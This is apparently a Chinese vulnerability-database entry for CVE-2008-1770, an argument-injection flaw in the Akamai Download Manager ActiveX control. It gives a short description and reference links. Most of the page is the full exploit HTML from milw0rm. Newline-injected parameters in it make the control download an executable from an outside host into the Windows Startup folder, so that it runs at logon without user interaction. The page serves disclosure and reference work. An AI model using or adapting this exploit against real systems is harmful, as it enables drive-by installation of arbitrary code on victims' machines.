Akamai下载管理器ActiveX控件参数注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115350 漏洞类型 代码注入
发布时间 2008-06-04 更新时间 2008-09-05
CVE编号 CVE-2008-1770 CNNVD-ID CNNVD-200806-067
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/5741
https://cxsecurity.com/issue/WLB-2008060083
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-067
|漏洞详情
kamai下载管理器是用于帮助用户方便下载的客户端软件。Akamai的ActiveX控件在处理参数数据时存在漏洞,远程攻击者可能利用此漏洞在用户系统的任意地方写入文件。当用户从http://dlm.tools.akamai.com/tools/upgrade.html下载安装Akamai下载管理器ActiveX控件时,其参数设置为:PARAMname="URL"value="http://dlm.tools.akamai.com/tools_files/Readme.txt"然后设置URL值。但如果向URL注入其他字符的话,也可以正确的解析,例如:PARAMname="URL"value="http://dlm.tools.akamai.com/tools_files/Readme.txt\x0Areferer=http://ruder.cdut.net"由于ActiveX所设置的参数值以INI文件格式保存在临时文件中,上述方式会改变referer值。此外,使用了target参数设置下载文件的位置,含义如下:"DESKTOP"将文件保存到桌面"AUTO"将文件保存到临时Internet文件中询问用户选择保存位置正常情况下target值只能设置为以上三个值,其他值会被过滤掉。但如果通过参数注入将该值设置为有效的文件路径的话,就可以任意设置target,Akamai下载管理器会未经用户交互直接将目标文件下载到用户系统的任意位置。
|漏洞EXP
<html>
        

    <!--

	/**********************************************************************************
	Exploit start here, by cocoruder(frankruder_at_hotmail.com)
	For "Akamai Download Manager File Download To Arbitrary Location Vulnerability".         

	This exploit will download "http://ruder.cdut.net/attach/calc.exe" to "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\calc_run.exe".
	***********************************************************************************/

        
                
        DLM:       v2.2.3
        Received:  ActiveX, v2.2.3.5
        Reason:    MSIE 6
        Language:  en (Automatically detected)
                
            
    -->

    <head>

        <!-- Begin head fragment -->

        
            
                
  <title>Download Manager</title> 
  <script TYPE="text/javascript" LANGUAGE="javascript">
  window.resizeTo(500,510);
  </script>

            

        <!-- End head fragment -->

        <script language="JavaScript">

            var bDocReady = false;
            var bInsObj   = false;
            var isLinux   = (navigator.userAgent.indexOf("Linux") >= 0);
            var isMacFF   = (navigator.userAgent.indexOf("Firefox") >= 0 && navigator.userAgent.indexOf("Mac") >= 0);
            var isSafari  = (navigator.userAgent.indexOf("Safari") >= 0);
            var isSolaris = (navigator.userAgent.indexOf("Sun") >= 0);
            var isWinFF   = (navigator.userAgent.indexOf("Firefox") >= 0 && navigator.userAgent.indexOf("Windows") >= 0);
            var isIE7     = (navigator.userAgent.indexOf("MSIE 7") >= 0);

            function doLoad() {
        
                // Start automatically
                setTimeout("startDLM();", 1000);
            
                return;
            }

        
                

            var bdmIsReady = false;
            var bDMStarted = false;
            var bDMFailed  = false;
            var bShutdown  = false;

            var startTries = 0;

            function closeIt() {
                if (isIE7) {
                        return;
                }

                if (bDMStarted && !bShutdown) {
                    event.returnValue = "The Download Manager is still running.\n" +
                        "Pressing 'OK' will stop any active downloads and close the Download Manager.";
                }
            }

            

        </script>

        
        <noscript><meta http-equiv="Refresh" content="2;url=http://dlm.tools.akamai.com/tools_files/Readme.txt" /></noscript>
            

    </head>

    <body onload="doLoad()" onbeforeunload="closeIt()">

        <!-- Begin body fragment -->

        
            
                
                    
                        <table cellpadding="10" cellspacing="0" border="0">
<tr><td>
<strong>About the Download Manager</strong><br>
<p>The Download Manager provides for more effective, more efficient file downloads than you normally see with your browser, especially for large files or file sets.  It can pause and restart downloads even if you turn your computer off and on again. You will be presented with a security warning and after you accept, the Download Manager will install and begin to download the requested file.</p>	
<p>Should the Download Manager fail to start, or if you do not accept the security certificate, you can <a href=http://dlm.tools.akamai.com/tools_files/Readme.txt>click here</a> to download the file without using the download manager.</p><p/>
</td></tr>
</table>

                    
            

        <!-- End body fragment -->

        <DIV ID="objectDIV"></DIV>

        <script language="JavaScript">

        
                

            // Initiate shutdown
            function doDLMShutdown() {
                if (bShutdown) {
                    return;
                }

                bShutdown = true;
                window.opener = null;
                window.close();
            }


            // Initiate the download
            function doStart() {
                startTries++;
                if (startTries > 120) {
                    bDMFailed = true;
                    return;
                }

                try {
                    var dm = document.getElementById("dm");
                    if (dm == null) {
                        bDMFailed = true;
                        return;
                    }
                    dm.detachEvent("DLMShutdown", doDLMShutdown);
                    dm.attachEvent("DLMShutdown", doDLMShutdown);
                
                    
                    dm.StartDownload();
                    
                    bDMStarted = true;
                } catch (e) {
                    bDMStarted = false;
                    if (e.description != "object Error") {
                        bDMFailed = true;
                    }
                }
            }

            // Start the DLM
            function startDLM() {

				//alert("pause");

                if (bDocReady) {
                    insertObj();
                    if (bdmIsReady) {
                        doStart();
                    }
                }

                if (bDMFailed) {
                    // Don't try to go direct, since this happens by
                    // default on XP SP2 and above.
                    return;
                }

                if (!bDMStarted) {
                    setTimeout("startDLM();", 500);
                }
            }

            // Check if the DM object is fully loaded
            function dmReady() {
                var dm = document.getElementById("dm");
                if (dm == null) {
                    bDMFailed = true;
                    return;
                }

                if (dm.readyState == 4) {
                    bdmIsReady = true;
                }
            }
            

            // Check if the document is fully loaded
            function docReady() {
                if (document.readyState == "complete") {
                    bDocReady = true;
                } else {
                    bDocReady = false;
                }
            }

            // Insert the code to create the DM object
            function insertObj() {
                // Only insert the object once
                if (!bInsObj) {
                    bInsObj = true;

                    // Create object tag
        
                
                    var sObjHTML = "<object id=\"dm\" classid=\"CLSID:4871A87A-BFDD-4106-8153-FFDE2BAC2967\" CODEBASE=\"http://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.3.5.cab#Version=2,2,3,5\" width=1 height=1> " +
                        "   <PARAM name=\"logging\" value=\"1\"/> " +
            
                        "    <PARAM name=\"version\" value=\"2.2.3\"/> " +



						/**********************************************************************************
						Exploit start here, by cocoruder(frankruder_at_hotmail.com)
						For "Akamai Download Manager File Download To Arbitrary Location Vulnerability".         

						This exploit will download "http://ruder.cdut.net/attach/calc.exe" to "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\calc_run.exe".
						***********************************************************************************/

                        "    <PARAM name=\"URL\" value=\"http://ruder.cdut.net/attach/calc.exe\x0Areferer=http://ruder.cdut.net\x0Amd5=\x0Atarget=C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\calc_run.exe\x0AlogoURL=\x0AiconURL=\x0AproviderName=\x0Alaunch=\x0AcloseWhenDone=yes\x0Aresumable=\x0AdisregardQryStr=\x0AmaxCon=4\x0AinitialView=summary\x0AxPos=100\x0AyPos=100\x0Aicon=true\x0Aencrypt=\x0Alogging=1\x0AfgColor=\x0AbgColor=\x0ArecoveryUrl=http://dlm.tools.akamai.com/Readme.txt\x0AflushSize=32\x0Alanguage=en\x0AuseMD5=\x0AuseStateReporting=1\x0AbundleDetails=\x0AbundleEnabled=\x0ArequestSize=1024\x0AswooshEnabled=\x0AswooshInstall=\x0Acookie=\"/> " +



                        "    <PARAM name=\"recoveryURL\" value=\"http://dlm.tools.akamai.com/Readme.txt\"/> " +
                        "    <PARAM name=\"language\" value=\"en\"/> " +
                        "    <PARAM name=\"providerName\" value=\"\"/> " +
                        "    <PARAM name=\"maxCon\" value=\"4\"/> " +
                        "    <PARAM name=\"maxConn\" value=\"4\"/> " +
                        "    <PARAM name=\"requestSize\" value=\"1024\"/> " +
                        "    <PARAM name=\"flushSize\" value=\"32\"/> " +
        
            
                        "    <PARAM name=\"initialView\" value=\"summary\"/> " +
            
        
        
                        "    <PARAM name=\"icon\" value=\"true\"/> " +
            
        
        
        
        
        
                        "    <PARAM name=\"launch\" value=\"no\"/> " +
            
        
                        "    <PARAM name=\"closeWhenDone\" value=\"no\"/> " +
            
        
        

        

        
                        "</object> ";
            

                    objdiv = document.getElementById("objectDIV");
                    if (objdiv == null) {
        
                        document.location.replace("http://dlm.tools.akamai.com/tools_files/Readme.txt");
            
                        return;
                    }

        

                    objdiv.innerHTML = sObjHTML;

                    if (dm == null) {
                        bDMFailed = true;
                    }

                    // Set up handler for DM readystate change
                    dm.onreadystatechange = dmReady;
                    dmReady();

            

                }
            }

        

            // Set up handler for document readystate change
            document.onreadystatechange = docReady;

            

        </script>

    </body>

</html>

# milw0rm.com [2008-06-04]
|参考资料

来源:XF
名称:downloadmanager-url-code-execution(42879)
链接:http://xforce.iss.net/xforce/xfdb/42879
来源:SECTRACK
名称:1020194
链接:http://www.securitytracker.com/id?1020194
来源:BUGTRAQ
名称:20080605AkamaiDownloadManagerFileDownloadedToArbitraryLocationVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/493142/100/0/threaded
来源:BUGTRAQ
名称:20080604AkamaiTechnologiesSecurityAdvisory2008-0001(DownloadManager)
链接:http://www.securityfocus.com/archive/1/archive/1/493077/100/0/threaded
来源:MILW0RM
名称:5741
链接:http://www.milw0rm.com/exploits/5741
来源:VUPEN
名称:ADV-2008-1746
链接:http://www.frsirt.com/english/advisories/2008/1746/references
来源:SECUNIA
名称:30537
链接:http://secunia.com/advisories/30537
来源:FULLDISC
名称:20080604AkamaiTechnologiesSecurityAdvisory2008-0001(DownloadManager)
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2008-June/062672.html